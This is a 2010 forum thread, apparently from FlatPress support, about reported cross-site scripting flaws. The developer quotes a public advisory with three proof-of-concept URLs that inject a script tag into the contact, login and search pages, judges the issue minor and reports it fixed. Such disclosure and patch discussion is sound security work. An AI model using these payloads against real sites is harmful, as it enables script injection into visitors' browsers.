Not signed in ( Sign In)


Welcome, Guest

Want to take part in these discussions? Sign in if you have an account, or apply for one below

Vanilla 1.1.10 is a product of Lussumo. More Information: Documentation, Community Support.

    • CommentTimeJan 27th 2010 edited
    According to there are multiple cross site scripting vulnerabilities. Have these been verified? How serious is it?
    • CommentTimeJan 28th 2010 edited
    Usually people contact me before they disclose a security hole. How kind of this guy not doing it. Oh, well.

    Thank you for pointing that out.

    Here is the text of the exploit:

    | # Title : FlatPress Cross Site Scripting Vulnerability |
    | # Author : indoushka |
    | # email : |
    | # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
    | # Web Site : |
    | # Script : powered by FlatPress / |
    | # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
    | # Bug : XSS |
    ====================== Exploit By indoushka =================================
    | # Exploit :
    | 1- http://server/flatpress/contact.php/>"><ScRiPt>alert(+213771818860)</ScRiPt>
    | 2- http://server/flatpress/login.php/>"><ScRiPt>alert(+213771818860)</ScRiPt>
    | 3- http://server/flatpress/search.php/>"><ScRiPt>alert(+213771818860)</ScRiPt>
    ================================ Dz-Ghost Team ========================================
    Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 |

    if you point your browser to those URLs you'll get a JavaScript alert. IMO it is not a very dangerous issue (the attacker must send you a specially crafted URL and you have to follow it), by the way it's now fixed on SVN

    • CommentTimeJan 28th 2010
    I had the same thing when I was still actively developing Postfix Admin. Always nice when they just publish.
    Thanx for fixing it so quickly! Any idea when the next release will be out?
    • CommentTimeApr 4th 2010
    Hi, is there a plan to patch for this?

    Also, I discovered this page referring to another exploit: (posted today?)

    Both seem like fairly serious problems. I have Flatpress on ten sites... and was thinking I may use the PHP strip_tags function to only allow a small subset of tags, perhaps a quick workaround for the fix?
    • CommentTimeApr 4th 2010 edited
    lastcomments is a horrible,horrbile plugin thrown that really mostly as an example, since people asked for it. I don't even use it (usually).
    By the way, I have "fixed" the offending line on SVN

    the other issue discussed here has been fixed already in FP 0.909.1